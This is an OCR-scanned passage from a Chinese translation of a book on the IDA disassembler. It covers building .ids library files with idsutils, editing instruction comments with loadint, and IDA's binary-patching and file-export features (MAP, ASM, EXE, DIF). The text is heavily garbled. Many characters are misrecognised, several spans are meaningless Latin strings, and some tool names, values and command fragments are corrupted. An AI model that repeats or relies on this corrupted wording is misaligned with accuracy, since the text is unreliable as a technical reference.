D 序号 后 是 一 个 空格 ， 后 面 接 Name= 函 数 形式 的 Name 指令 ， 例 如 ，Name=Reg0penKeyA。 如 果 

使 用 零 这 个 特殊 的 序号 , 则 Name 指令 用 于 指定 当前 的 .idt 文件 所 描述 的 库 名 称 , 如 下 所 示 : 























0 Name-advapi32.dll 


Q 一 个 可 选 的 Pascal 指令 可 用 于 说 明 一 个 函数 是 否 使 用 了 了 stdcall 调用 约定 ， 并 指出 该 晒 
数 在 返回 时 从 栈 中 删除 了 多 少 个 字 节 的 数据 。 例 如 : 


483 Name-RegOpenKeyA Pascal-12 











Q 可 以 在 导出 项 后 附加 一 个 可 选 的 Comment 指令 , 指定 一 条 注释 , 并 在 反 汇 编 代 码 清单 中 每 
个 引用 该 函数 的 位 置 与 函数 一 起 显示 这 条 注释 。 一 个 完整 的 导出 项 如 下 所 示 : 














483 Name-RegOpenKeyA Pascal-12 Comment-Open a registry key 


此 外 , 读者 可 以 参阅 idsutils 的 readme.txt 文件 了 解 其 他 可 选 指 令 。idsutils 解析 实用 工具 
的 目的 ， 是 尽 可 能 日 动 化 地 创建 .idt 文件 。 创 建 .idt 文件 的 第 一 步 是 获得 你 希望 解析 的 库 的 副本 。 
然后 ， 使 用 合适 的 解析 实用 工具 解析 这 个 副本 。 如 果 和 希望 为 与 OpenSLL 有 关 的 ssleay32.dll 库 创 
建 一 个 .idt 文件 ， 可 以 使 用 以 下 命令 : 

$ ./dll2idt.exe ssleay32.dll 


Convert DLL to IDT file. Copyright 1997 by Yury Haron. Version 1.5 
File: ssleay32.dll ... ok 
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这 时 ， 如 果 解 析 成 功 ， 我 们 将 得 到 一 个 名 为 SSLEAY32.idt 的 文件 。 由 于 dll2idt.exe 基于 从 
DLL 库 本 身 获得 的 信息 生成 输出 文件 和 名， 因此， 输入 文件 名 与 输出 文件 名 之 间 存在 大 小 写 差异 。 
生成 的 ,idt 文件 的 前 几 行 如 下 所 示 : 


ALIGNMENT 4 
; DECLARATION 











O Name-SSLEAY32.dll 


3 

121 Name=BIO f ssl 

173 Name-BIO new buffer ssl connect 
122 Name-BIO new ssl 

174 Name-BIO new ssl connect 

124 Name-BIO ssl copy session id 


"Dt EDU. MEDDASRJGIAAAE— reg Er Kos EA stdcal1， 以 及 如 果 使 用 了 ， 它 从 栈 上 删 
除了 多 少 字 节 的 数据 。 要 想 增加 任何 Wie 或 Comment 指令 ， 你 必须 在 创建 最 终 的 .ids 文件 之 前 
使 用 文本 编辑 需 手 动 添加 。 创 建 .ids 文件 的 最 后 一 个 步骤 是 使 用 zipids.exe 实用 工具 压缩 .idt 文件 ， 
并 将 得 到 的 .ids 文件 复制 到 <IDADIR>/ids 目录 中 。 











$ ./zipids.exe SSLEAY32.idt 
File: SSLEAY32.idt  ... (219 entries [0/0/0]] packed 
$ cp SSLEAY32.ids ../Ida/ids 


这 样 ， 只 要 加 载 了 一 个 链接 到 ssleay32.dll 的 二 进 制 文 件 ，IDA 就 会 加 载 SSLEAY32.idss WH 
果 你 选择 不 将 新 建 的 .ids 文件 复制 到 <IDADIR>/ids 目录 中 ,你 随时 可 以 通过 File » Load File » IDS 
File IREN] o 

在 使 用 .ids 文件 时 ， 可 采用 另 一 个 步骤 将 .ids 文件 链接 到 特定 的 .sig 或 . 包 文 件 。 在 选择 .ids X 
fF, IDA 会 使 用 一 个 名 为 <IDADIR>/ida/idsnames 的 IDS 配置 文件 。 这 个 文本 文件 可 执行 以 下 
操作 。 

口 将 共享 库 的 名 称 与 它 对 应 的 . ids 文件 名 映 昧 起来。 如果 共 享 库 的 名 称 不 能 完全 转换 成 一 个 

MS-DOS 8.3 形式 的 文件 名 ， 这 样 做 可 帮助 IDA 定位 正确 的 .ids 文件 ， 如 下 所 示 : 




















libc.so.6 libc.ids 十 


O 将 .ids Du 文件 映射 起 来 。 这 样 ， 只 要 IDA 加 载 指定 的 .ids 文件 ， 它 会 自动 加 载 指 定 的 . 世 
文件 。 使 用 下 面 的 命令 , 一 旦 IDA 加 载 SSLEAY32.ids openssl.til 文件 将 会 目 动 加 载 (请 
参阅 idsnames 文件 了 解 相 关 语 法 信息 ): 











SSLEAY32. ids SSLEAY32. ids +  openssl.til 


D 将 .sig 文件 与 对 应 的 .ids 文件 映射 起 来 。 m, 只 要 反 汇 编 代 码 清单 应 用 指定 的 ,sig 文件 ， 
IDA 将 加 载 指定 的 .ids 文件 。 下 面 的 命令 行 指出 : 一 旦 用 户 应 用 tei FLIRT 签名 , IDA 
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应 加 载 SSLEAY32.ids 文件 : 
libssl.sig SSLEAY32.ids 十 
第 15 章 将 介绍 如 何 使 用 脚本 编写 idsutils 提供 的 库 解 析 器 。 同 时 , 我 们 将 利用 IDA 的 函数 
分 析 功 能 生成 更 加 详细 的 .idt 文件 。 
13.2 ”使 用 1oadint 扩充 预定 义 注释 


在 第 73&rp, 我 们 介绍 了 IDA 的 “上 日 动 注释 ”概念 ,如果 局 用 了 它 , IDA 将 显示 描述 每 个 汇 
编 语 言 指令 的 注释 。 如 下 所 示人 是 这 种 注释 的 两 个 例子 : 


.text:08048654 lea ecx, [esptarg 0] ; Load Effective Address 
. text :08048658 and esp, OFFFFFFFoh ; Logical AND 





这 些 预定 义 注释 保存 在 <IDADIR>/ida.int 文件 中 , 这 些 注释 主要 按 CPU 类 型 排序 ,其 次 按 指 
令 类 型 排序 。 如 果 启 用 自动 注释 ，IDA 会 在 ida.int 文件 中 搜索 与 每 一 条 指令 有 关 的 注释 ， 如 果 找 
到 ， 它 将 在 反 汇 编 代码 清单 的 右 侧 显示 这 些 注释 。 

使 用 1oadint "实用 工具 可 以 修改 现 有 的 注释 , 或 在 ida.int 文件 中 添加 新 注释 。 如 我 们 前 面 讨 
论 的 其 他 附加 实用 工具 一 样 ，1oadint 发 行 版 目 带 的 readme.txt 文件 介绍 了 loadint 的 用 法 。 
loadint 发 行 版 中 还 包含 大 量 的 .cmt 文件 ， 它 们 是 描述 IDA 的 所 有 处 理 融 模块 的 预定 义 注 释 。 修 
改 现 有 注释 的 过 程 非 党 简单， 首先 确定 与 处 理 需 关联 的 注释 文件 (如 用 于 x86 AO ZS pe.cmt 
文件 )， 其 次 修改 其 中 的 注释 ， 运 行 loadint 重新 创建 ida.int 注释 文件 ， 最 后 将 得 到 的 ida.int 文件 
复制 到 IDA 主 目录 中 ， 下 次 启动 时 ，IDA 将 从 这 个 目录 加 载 新 建 的 ida.int 文件 。 一 段 重建 注释 
数据 库 的 简单 代码 如 下 所 示 : 






































$ ./loadint comment.cmt ida.int 
Comment base loader. Version 2.04. Copyright (c) 1991-2011 Hex-Rays 


17566 cases, 17033 strings, total length: 580575 











你 和 希望 进行 的 更 改 包 括 : 修改 现 有 注释 ， 或 为 没有 注释 的 指令 添加 注释 。 例 如 ,在 pc.cmt 
文件 中 ,为 使 在 局 用 日 动 注释 时 不 会 生成 过 多 注释 , IDA 并 没有 为 几 个 比较 稼 见 的 指令 涩 加 注释 。 
下 面 的 代码 行 取 目 pec.cmt 文件 ， 它 们 证 实 ， 上 默认 情况 下 ，x86mov 指令 并 不 生成 注释 : 





NN ltr: "Load Task Register" 
/ /NN mov: "Move Data" 
NN movsp: "Move to/from Special Registers" 














如 果 你 希望 为 mov 指令 添加 注释 , 你 可 以 删除 中 间 一 行 注释 , 并 根据 详细 步骤 重建 注释 数据 库 。 


(D 当前 版 本 为 loadint61.zip。 
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loadint 文档 资料 中 的 一 条 提示 指出 : loadint 必须 能 够 找到 IDA 发 行 版 自 带 的 ida.hlp 文件 。 
如 果 你 收 到 以 下 错误 消息 ， 应 该 将 ida.hlp 文件 复制 到 loadint 目录 ， 并 重新 运行 loadint。 


$ ./loadint comment.cmt ida.int 

Comment base loader. Version 2.04. Copyright (c) 1991-2011 Hex-Rays 

Can't initialize help system. 

File name: 'ida.hlp', Reason: can't find file (take it from IDA distribution). 


此 外 ， 你 可 以 对 loadint 使 用 -n 选 项， 指定 <IDADIR> 的 位 置 ， 如 下 面 的 命令 行 所 示 : 
$ ./loadint -n «IDADIR» comment.cmt ida.int 


comment.cmt 文件 是 loadint 的 主 输 入 文件 ， 这 个 文件 的 语法 记录 在 loadint 文档 中 。 简 言 
Z, commnet.cmt 创建 处 理 需 类 型 与 相关 的 注释 文件 之 间 的 映射 。 特 定 于 处 理 需 的 注释 文件 则 反 
过 来 指定 特定 指令 与 每 条 指令 的 相关 注释 文本 之 间 的 对 应 关系 。 整 个 过 程 由 几 个 枚 举 〈C 风格 枚 
Ze ) 第 量 控 制 ， 它 们 定义 所 有 人 处理 带 类 型 ( 位 于 comment emt 文件 中 ) 以 及 每 个 处 理 需 可 能 使 用 
的 所 有 指令 (位 于 allins.hpp 文件 中 )。 

如 末 你 布 望 给 一 个 全 新 的 处 理 需 类 型 添加 预定 义 注 释 , 这 个 过 程 可 能 会 比 仅 修 改 现 有 的 注释 
要 复 傈 一些。 而且， 这 个 过 程 还 与 创建 新 的 处 理 需 模块 〈 人 参见 第 19 章 ) 直接 相关 。 如 果 不 深 入 
分 析 处 理 喜 模块， 要 给 一 个 全 新 的 处 理 需 类 型 添加 注释 ， 首 先 ， 你 需要 在 allins.hpp 文件 中 创建 
一 个 新 的 枚 举 和 常量 集合 ( 与 处 理 顺 模块 共享 )， 由 它 为 指令 集中 的 每 条 指令 定义 一 个 常量 ; 其 次 ， 
必须 创建 一 个 注释 文件 ,将 每 个 枚 举 指 令 常 量 与 相关 的 注释 文本 关联 起 来 ; 最 后 ， 必 须 为 你 的 处 
理 带 类 型 定义 一 个 新 常量 ( 同样 ， 与 处 理 带 模块 共享 )， 并 在 comment.cmt 中 创建 一 个 条 目 ， 将 
处 理 大 类 型 与 相关 的 注释 文件 对 应 起 来 。 完 成 这 些 步骤 后 ， 必须 运行 loadint, 建立 一 个 新 的 注释 
数据 库 ， 并 将 新 的 处 理 器 类 型 及 相关 注释 添加 到 其 中 。 
































13.3 ”小结 


虽然 idsutils 和 loadint 现在 似乎 对 你 没有 什么 用 处 ， 但 是 ， 只 要 开始 应 用 IDA 的 高 级 功 
能 ， 你 就 需要 用 到 这 些 实用 工具 。 只 需要 花 一 点 点 时 间 创 建 一 个 .ids 或 . 弓 文 件 ， 随 后 ， 如 果 你 在 
将 来 的 项 目 中 遇 到 由 这 些 文件 描述 的 库 ， 就 可 以 节省 大 量 的 时 间 。 记 住 ，IDA 不 可 能 为 现 有 的 每 
一 个 库 提 供 注释 。 本 章 介 绍 的 工具 旨 在 帮助 你 全 面 了 解 IDA 中 的 库 。 














修 仆 二 进 制 文 件 及 其 他 
IDA 限制 











| DA 新 用 户 及 湾 在 用 户 最 稼 问 的 一 个 问题 是 :“ 如 何 使 用 IDA 修补 二 进 制 文件 ?” ”这 个 问 
题 的 答案 非常 简单 :“ 你 无 法 做 到 。 ”IDA 的 目标 是 提供 最 全 面 的 反 汇 编 代码 清单 ， 帮 助 你 
理解 二 进 制 文件 的 行为 。 IDA 并 不 能 帮助 你 轻松 修改 你 所 分 析 的 二 进 制 文件 。 由 于 没有 具体 的 答 
Z, 一 些 硕 固 的 用 户 通 常会 继续 提出 以 下 间 题 “那么 Edit » Patch Program 采 单 有 什么 用 呢 ?” 
“File » Produce File » Create EXE File 的 作用 又 是 什么 ? ”本 音 将 讨论 这 些 明 显 的 反常 现象 , 同时 ， 
我 们 将 让 IDA 帮助 我 们 ( 至 少 在 一 定 程 度 上 ) 为 二 进 制程 序 文件 开发 补丁 程序 。 


14.1 隐 汗 的 补丁 程序 菜单 


如 第 11 章 所 述 ，Edit » Patch Program 菜单 是 GUI 版 本 的 IDA 的 一 项 隐藏 功能 ， 用 户 需 要 编 
辑 idagui.cfg 配置 文件 才能 激活 该 荣 单 ( 默认 情况 下 , 控制 台 版 本 的 IDA 的 Patch 菜单 是 可 用 的 )。 
Edit > Patch Program 子玉 单 中 的 可 用 选项 如 图 14-1 所 示 。 




















Operand type 
Comments 
Segments 
Structs 


Functions 





k 

k 

k 

k 

k 
Patch program E Change byte... 
Other t Change word... 
Plugins b Assemble... 


图 14-1 Patch program FÉ 


HPR mm EDD, KRE AERA RA AEAEE BAER, pues 
项 提供 了 3 种 修改 数据 库 的 方法 。 实际 上 , SAAE, ERE AEE EH K 
分 IDA 数据 库 与 创建 该 数据 库 的 二 进 制 文件 之 间 的 区 别 。 创 建 一 个 数据 库 后 ，IDA 绝 不 会 再 次 
引用 最 初 的 二 进 制 文件 。 鉴 于 此 ， 这 个 采 单 更 适合 叫做 DD DOODO。 

(Bæ, AEE, K 14-1 中 的 沫 单项 仍然 提供 了 一 种 最 二 接 的 方法 ， 让 你 观察 你 对 最 初 的 
二 进 制 文件 所 作 的 任何 更 改 所 造成 的 影响 。 在 本 章 后 面 , 我 们 将 讨论 如 何 导 出 你 所 作 的 修改 , 并 
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最 终 利 用 这 些 信 息 来 修补 二 进 制 文件 。 
14.1.1 RO Silke 


Edit » Patch Program » Change Byte 荣 单 项 用 于 编辑 IDA 数据 库 中 的 字 节 值 。 相 关 的 字 节 编 
辑 对 话 框 如 图 14-2 所 示 。 


à Patch Bytes | xl 
Address 0x40 1606 

File offset ÜxAÜB 

Original value 40 80 3C 0100 75 F8 83 CO 01 50 FF 35 28 40 40 


Values | 40 80 3C 0100 75F8 83 C0 01 50 FF 35 28 40 4d "| 







图 14-2 Patch Bytes 对 话 框 


这 个 对 话 框 显示 了 从 光标 所 在 位 置 开始 的 16 个 字 市 的 值 。 你 可 以 更 改 对 话 框 中 显示 的 部 分 
或 全 部 字 节 , 但 是 ， 如 果 不 关 闭 该 对 话 框 ,将 光标 重新 定位 到 一 个 新 的 数据 库 位 置 ， 并 重新 打开 
该 对 话 框 ,你 将 不 能 修改 这 16 个 字 市 以 外 的 其 他 字 市 。 注 意 ， 这 个 对 话 框 还 显示 你 所 更 改 的 子 
广 的 虚拟 地 址 和 “文件 仿 移 量 ” 值 。“ 文 件 偏 移 量 ” 值 是 你 所 修改 的 字 市 在 最 初 的 二 进 制 文 件 中 
的 十 六 进 制 偶 移 量 。 由 于 IDA 在 数据 库 中 保留 每 个 字 节 在 最 初 文件 中 的 俩 移 量 信息 ， 如 采 硕 望 
为 最 初 的 二 进 制 文件 开发 补丁 ， 就 可 以 利用 这 些 信 息 。 最 后 ， 无 论 你 如 何 修改 数据 库 中 的 字 节 ， 
对 话 框 的 Original value 字段 将 始终 显示 最 初 加 载 到 数据 库 中 的 字 节 值 。IDA 不 能 日 动 恢复 你 对 
最 初 的 字 方 值 所 作 的 修改 ， 不过， 你 可 以 创建 一 段 DA 脚本 来 完成 这 个 任务 。 

IDA 5.5 引入 了 一 个 功能 更 加 强大 的 十 六 进 制 窗 口 (参见 第 5 章 ), 为 编辑 数据 库 字 市 提供 了 
-种 更 好 的 解决 方案 。 有 了 这 个 集成 式 十 六 进 制 编辑 功能 ， 用 户 很 少 需要 使 用 IDA 的 “更 改 字 
万 ”功能 。 


14.1.2 ”更 改 数据 库 中 的 字 
相 比 于 字 市 修补 功能 ，IDA 的 字 修 补 功能 的 作用 更 加 有 限 。IDA 的 Patch Word 对 话 框 如 
fi 


图 14-3 所 示 ， 它 一 次 只 能 修补 一 个 2 字 节 的 字 。 























DCTITTEENENNR zi 
Addresss 0x40 1606 
File offset OxAOB 
Original value 0x804 


Value (word) | ox8040 -] 





图 14-3 Patch Word 对 话 框 
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和 修补 学 市 对 话 框 一 样 , 该 对 话 框 显 示 了 所 修改 的 字 的 虚拟 地 址 和 文件 偏 移 量 。 需 要 记 住 的 
是 ,这 里 的 字 值 使 用 底层 处 理 需 的 自然 字 节 顺序 显示 。 例 如 , 在 x86 反 汇编 代码 清单 中 , SEC 
做 “小 端 ” 值 处 理 ， 而 在 MIPS 反 汇 编 代 人 码 清单 中 ， 凶 被 当做 “大 端 ” 值 处 理 。 在 输入 新 的 字 值 
时 ,请 记 住 这 一 点 。 与 修补 字 市 对 话 框 相同 ,不论 你 使 用 修补 字 对 话 框 修 改过 多 少 次 字 的 值 ， 
Original value 字段 将 始终 显示 从 原始 二 进 制 文件 中 加 载 的 初始 但。 与 字 下 编辑 一 样 ,在 IDA 的 
Hex View 窗口 中 执行 编辑 更 容易。 


14.1.3 ”使 用 汇编 对 话 框 


“修补 程序 ” 羔 单 中 最 有 趣 的 功能 , 可 能 要 数 “汇编 ”选项 ( Edit > Patch Program » Assemble )。 
遗憾 的 是 , 这 项 功能 并 非 对 所 有 处 理 需 类 型 有 歼 , 因为 它 取 决 于 当前 的 处 理 融 模块 是 否 拥有 一 个 
内 部 汇编 器 。 例 如 ，x86 处 理 器 模块 支持 汇编 ， 而 MIPS 处 理 需 模块 却 不 文 持 汇编 。 如 果 缺 乏 汇 
编 器 ， 你 将 收 到 一 条 错误 消息 ， 它 指出 :“ 对 不 起 ， 本 处 理 器 模块 不 支持 这 种 汇编 器 。” 

利用 “汇编 ”选项 可 以 输入 使 用 一 个 内 部 汇编 右 汇 编 的 汇编 语言 语句 。 然 后 ，IDA 会 将 得 到 
的 指令 字 节 写 人 当前 的 屏 考 位置。 用 于 输入 指令 的 Assemble instruction 对 话 框 如 图 14-4 Hr ar. 


Previous line: 
Address ` Dxli : üx40180B 


Instruction | sl 
zs lm 










































K| 14-4 Assemble instruction 对 话 框 


在 Instruction 输入 框 中 , 一 次 可 以 输入 一 条 指令 。IDAx86 AE ZE Er pl has HL TE x86 








反 汇 编 代 码 清单 中 使 用 的 语法 。 单 击 OK (或 按 下 ENTER BR) 后 ，IDA 将 汇编 你 输入 的 指令 ， 并 
将 对 应 的 指令 字 节 输入 数据 库 中 ,这些 指 令 字 市 的 起 始 地 址 为 Address 字段 中 显示 的 虚拟 地 址 。 内 
部 IDA 汇 编 器 可 在 指令 中 使 用 符号 名 称 ， 只 要 程序 中 存在 这 些 名 称 即 可 。 诸 如 mov [ebp+var 4]、 
eax 和 call sub 401896 之 类 的 语法 都 属于 合法 霹 法 ， 汇 编 柄 能 够 正确 解析 符号 引用 。 

输入 一 条 指令 后 , 该 对 话 框 仍 处 于 打开 状态 , 并 准备 在 紧 接 输入 的 前 一 条 指令 之 后 的 虚拟 地 
址 上 接受 另 一 条 新 指令 。 在 你 输入 其 他 指令 后 ， 该 对 话 框 将 在 Previous line 字段 中 显示 你 输入 的 
前 一 条 指令 。 

输入 新 指令 时 ,必须 注意 指令 对 齐 。 如 果 你 正 输 入 的 指令 的 长 度 与 它 所 替代 的 指令 的 长 度 不 
同 ， 就 特别 需要 注意 指令 对 齐 。 如 果 新 指令 比 它 所 替代 的 指令 短 , 那么 ,你 需要 考虑 如 何 处 理 旧 
和 令 剩 下 的 多 余 字 节 (插入 NOP ”指令 是 一 种 可 行 的 解决 办 法 )。 如 果 新 指令 长 于 它 所 替代 的 指 
令 ，IDA 将 宪 盖 后 面 指令 的 字 方 ， 以 满足 新 指令 需要 。 这 样 做 可 能 会 对 你 的 操作 造成 巨大 影响 ， 
因此 , 在 使 用 汇编 器 修改 程序 字 节 时 ， 必 须 仔 细 规 划 。 你 可 以 把 汇编 器 看 做 是 一 个 始终 处 于 覆盖 
































(D NOP 表示 no operation (无 操作 )， 在 填充 程序 中 的 空间 时 ， 经 常 使 用 这 种 指令 。 
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模式 的 字 人 处 理 保 。 如 末 不 窗 盖 现 有 的 指令 ， 你 很 难为 新 指令 “ 开 屏 ”空间 。 

需要 记 住 的 是 ，IDA 的 数据 库 修 补 功能 仅 限于 能 够 轻松 融入 现 有 数据 库 空间 的 小 型 简单 补 
丁 。 如 果 补 丁 需 要 大 量 的 补充 空间 ,你 就 需要 在 最 初 的 二 进 制 文件 中 查找 尚未 使 用 的 空间 。 这些 
空间 通常 表现 为 填充 子 广 ,让 编 旧 插入 这 些 填充 字 广 的 目的 是 为 了 将 二 进 制 文件 的 不 同市 与 特殊 
的 文件 边界 对 齐 。 例 如 ， 在 许多 Windows PE 文件 中 ， 每 个 程序 节 的 起 始 文件 俩 移 量 必须 是 512 
字 节 的 整数 伴 。 如 朱 茶 节 占 用 的 空间 不 是 512 字 市 的 整数 售 ， 则 必须 对 它 填 充 ， 从 而 为 下 一 市 所 
供 一 个 512 子 市 的 边界 。 下 面 这 个 PE 文件 的 反 汇 编 代 码 清单 即 证 实 了 这 种 情况 : 








.text:0040963E ; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND] 


. text :00409644 e align 200h 

. text : 00409644 text ends 

. text : 00409644 

.idata:00404000 ; Section 2. (virtual address 00004000) 


在 这 个 代码 清单 中 ，IDA 使 用 一 个 对 齐 指令 C90 指出 该 市 被 填充 到 一 个 512 A (200h) 
的 边界 ， 其 起 始 地 址 为 ,text:00409644， 其 终点 为 下 一 个 整数 倍 的 512 字 市 ，.text:00409800。 通 
总 ， 编 译 需 会 用 零 填 满 填充 区 域 ， 在 十 六 进 制 窗 口中 ， 这 个 区 域 将 突出 显示 。 在 这 个 特殊 的 二 进 
制 文件 中 ， 文 件 中 的 空间 足够 插入 最 大 为 444 ( 0x1BC=409800h-409644h ) 字 节 的 补丁 数据 ， 这 
些 数据 将 窗 盖 .text 节 来 尾 的 一 部 分 或 全 部 以 零 填 充 的 区 域 。 你 可 以 对 另 数 进行 修补 ， 以 跳 转 到 
二 进 制 文件 的 这 个 区 域 ， 执 行 新 插入 的 程序 指令 ， 然 后 跳 回 最 初 的 函数 。 

需要 注意 的 是 ， 该 二 进 制 文件 的 下 一 节 ，.idata 节 ， 它 的 起 始 地 址 实际 上 为 .idata:0040A000。 
之 所 以 出 现 这 种 情况 ， 是 因为 内 存 对 齐 ( 而 非 文 件 对 齐 ) 限制 要 求 PE 区 域 采 用 4Kb (一 个 内 存 
页 ) 的 边界 。 理论 上 , 你 可 以 在 00409800~0040A000 的 内 存 范 围 内 插入 额外 的 2048 字 节 的 补丁 数 
据 。 但 是 ,你 很 难 完成 上 述 操 作 ， 因 为 在 这 个 可 执行 文件 的 磁盘 映像 中 ， 并 不 存在 与 这 个 内 存 范 
围 对 应 的 字 节 。 为 了 利用 这 片 空 间 ， 你 要 做 的 不 只 是 覆盖 最 初 的 二 进 制 文件 中 的 一 些 节 。 首 先 ， 
在 现 有 的 .text 节 末 尾 与 .idata 节 开 头 之 间 搬 和 一 个 2048 字 节 的 数据 块 。 其 次 ， 我 们 需要 在 PE 
文件 头 中 调整 .text 节 的 大 小 。 最 后 ， 我 们 需要 在 PE 文件 头 中 调整 .idata 及 随后 的 所 有 节 的 位 
置 ， 以 反映 一 个 事实 ， 即 随后 的 所 有 节 现 在 均 被 后 移 了 2048 字 节 。 这 些 更 改 听 起 来 可 能 并 不 十 
分 复杂 ， 但 它们 需要 操作 者 极其 注意 细节 ， 并 精通 PE 文件 的 格式 。 
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File » Produce File 菜单 是 IDA 的 一 个 更 加 有 趣 的 菜单 选项 。 使 用 这 个 菜单 中 的 选项 , IDA 能 
ÆR MAP, ASM, INC., LST. EXE. DIF 和 HTML 文件 。 其 中 许多 选项 听 起 来 很 有 吸引 力 ， 
下 面 逐 一 介绍 o 


















































14.2.1 1IDA 生 成 的 MAP 文 件 
map 文件 描述 二 进 制 文件 的 总 体 结构 ， 包 括 与 构成 该 二 进 制 文件 的 节 有 关 的 信息 ， 以 及 每 











节 中 符号 的 位 置 。 在 生成 .map 文件 时 , IDA 会 要 求 你 为 你 要 创建 的 文件 取 名 , 并 说 明 你 想 要 存储 
在 .map 文件 中 的 符号 的 类 型 。MAP 文件 选项 对 话 框 如 图 14-5 所 示 ， 你 可 以 从 中 选择 你 希望 包含 
在 .map 文件 中 的 信息 。 


Indude in the map file: 


m Segmentation information 


E Dummy names 


[ Demangle names 


[ Local names 





图 14-5 MAP 文件 生成 选项 
map 文件 中 的 地 址 信息 用 逻辑 地 址 表示 。 人 逻辑 地 址 使 用 一 个 段 号 和 一 个 段 仿 移 量 描述 符号 
的 位 置 。 一 个 简单 .map 文件 的 前 几 行 内 容 如 下 所 示 。 从 中 我 们 可 以 看 到 3 个 段 及 许多 符号 中 的 前 
两 个 符号 。 fprint 的 逻辑 地 址 表明 它 位 于 第 一 个 段 〈.text ) WF T fte SD 69h 的 位 置 。 


Start Length Name Class 
0001:00000000 000008644H .text CODE 
0002:00000000 000001DD6H .rdata DATA 
0003:00000000 000002B84H .data DATA 
Address Publics by Value 

0001: 00000000 main 

0001:00000069  fprintf 





IDA 生成 的 MAP 文件 与 Borland 的 Turbo Debugger 28722. TES A HI BEC. e ERTI HJ ut 
制 文件 时 ，.map 文件 可 帮助 我 们 恢复 符号 名 称 ， 这 是 此 类 文件 的 主要 用 途 。 





14.2.2 1IDA 生 成 的 ASM 文 件 


IDA 能 够 从 当前 数据 库 生 成 一 个 .asm 文件 。 这样 做 的 主要 目的 是 创建 一 个 能 够 被 汇编 硕 处 理 
的 文件 ， 以 重建 底层 二 进 制 文件 。IDA 会 设法 收集 足够 的 信息 ( 包括 结构 体 布局 ) 以 成 功 汇编 这 
个 文件 。 是 否 能 够 成 功 汇编 生成 的 .asm 文件 , 这 取决 于 许多 因素 , 但 其 中 最 重要 的 因素 在 于 你 使 
用 的 汇编 器 是 否 理 解 IDA 采用 的 语法 。 

目标 汇编 语言 语法 由 Options >» General X$ Analysis 选项 卡 下 的 Target assembler 设置 决定 。 
默认 情况 下 ,IDA 会 生成 一 个 表示 整个 数据 库 的 汇编 文件 。 但 是 , 你 可 以 通过 单 击 并 拖 动 ,或 使 
用 “SHIFT+ 上 季 头 键 ”或 “SHIFT+ 下 莆 头 键 ”滚动 并 选择 你 布 望 汇编 的 区 域 ， 从 而 限定 列表 的 
范围 。 在 控制 台 版 本 的 DA 中 ， 你 可 以 使 用 Anchor (ALT+L ) 命令 在 一 个 选择 区 域 的 起 始 位 置 
设置 一 个 锁 点 ， 然 后 使 用 区 头 键 扩 充 这 个 区 域 。 
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14.2.3 ”IDA 生成 的 INC 文 件 


INC ( 表示 包含 ) 文件 摘 述 数据 结构 和 枚 举 数 据 类 型 的 定义 。 基 本 上 , 这 个 文件 的 内 容 与 “ 结 
构 体 ”窗口 的 内 容 类 似 ， 只 是 其 形式 更 适合 汇编 带 处 理 。 





14.2.4 1IDA 生 成 的 LST 文 件 


LST 文件 不 过 是 IDA 反 汇 编 窗 口内 容 的 文本 文件 存储 形式 。 如 前 面 介 绍 ASM 文件 时 所 述 ， 
你 可 以 选择 一 个 你 想 要 转 储 的 地 址 范围 ， 以 限定 生成 的 列表 的 范围 。 


14.2.5 ”1IDA 生 成 的 EXE 文 件 


虽然 这 个 菜单 项 是 最 具 潜 力 的 茉 单项 , 但 它 也 是 缺陷 最 大 的 菜单 项 。 许多 文件 类 型 都 不 能 使 
用 这 个 菜单 项 。 你 可 能 会 收 到 这 样 一 条 错误 消息 : This type of output file is not supported ( 不 支持 
这 种 输出 文件 类 型 )。 

尽管 对 IDA 用 户 而 言 ， 这 是 一 项 理想 的 功能 ， 但 一 般 来 说 ， 要 想 从 DA 数据 库 重 新 生成 可 
执行 文件 ， 难 度 非 常 大 。 保 存在 IDA 数据 库 中 的 信息 ， 主 要 由 构成 最 初 的 输入 文件 的 各 市 中 的 
内 容 组 成 。 但 是 , 许多 时 候 ，IDA 并 不 处 理 输入 文件 的 每 一 让， 因此 ， 在 将 文件 加 载 到 数据 库 中 
时 ， 某 些 信息 将 会 遗失 ,这 使 得 我 们 无 法 从 数据 库 生 成 可 执行 文件 。 举 一 个 最 简单 的 例子 : 默认 
情况 下 ，IDA 并 不 加 载 PE 文件 的 资源 节 ( :rsrc )， 因 此 ， 你 不 可 能 通过 数据 库 恢复 资源 市。 

其 他 情况 下 , IDA 处理 与 最 初 的 二 进 制 文件 有 关 的 信息 , 但 你 并 不 能 轻易 访问 它们 的 原始 形 
式 。 这 些 信 息 包括 符号 表 、 导 入 表 和 导出 表 ， 你 需要 付出 相当 大 的 努力 才能 正确 重建 这 些 信 息 ， 
以 生成 一 个 真正 能 够 运行 的 可 执行 文件 。 

为 了 向 IDA 提供 生成 EXE 文件 的 功能 ，Atli Mar Gudmundsson 开发 了 pe script*。 这 是 一 组 
Bt PE 文件 使 用 的 IDA 脚本 。 其 中 一 个 脚本 名 为 pe write.idc, 可 用 于 在 现 有 数据 库 之 外 转 储 一 个 
正在 运行 的 PE 映像 。 如 果 想 要 修补 一 个 PE 文件 ， 使 用 脚本 时 完成 的 步 又 如 下 所 示 。 

(1) 将 你 想 要 修补 的 PE 文件 加 载 到 IDA 中 ， 确 保 清 除 加 载 程序 对 话 框 中 的 Make imports 
section ( 创建 导入 市 ) 选项 。 

(2) 运行 包含 的 pe sections.idc 脚本 ， 将 构成 最 初 二 进 制 文件 的 所 有 节 映 射 到 新 数据 库 中 。 

(3) 对 数据 库 进行 必要 的 更 改 。 

(4) 运行 pe write.idc 脚本 ， 将 数据 库 内 容 转 储 到 一 个 新 的 PE 文件 中 。 

第 15 章 将 讨论 使 用 IDC 编写 脚本 。 


14.2.6 1IDA 生 成 的 DIF 文 件 


IDA DIF 文件 是 一 个 纯 文本 文件 , 其 中 列 出 了 一 个 IDA 数据 库 中 所 有 被 修改 的 字 节 。 如 采 你 
希望 根据 对 IDA 数据 库 所 做 的 更 改 来 修补 最 初 的 二 进 制 文件 , DIF 文件 是 最 有 用 的 文件 格式 。 这 





























D 参见 http://www.hex-rays.com/idapro/freefiles/pe scripts.zip。 
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种 文件 格式 相当 简单 ， 如 下 面 的 .d 这 文件 所 示 。 
This difference file is created by The Interactive Disassembler 


dif example.exe 
000002F8: 83 FF 
000002F9: EC 75 
000002FA: 04 EC 
000002FB: FF 68 


这 个 文件 的 第 一 行 是 注释 , 第 一 行 是 最 初 的 二 进 制 文件 的 名 称 , 随后 则 是 文件 中 被 修改 的 字 
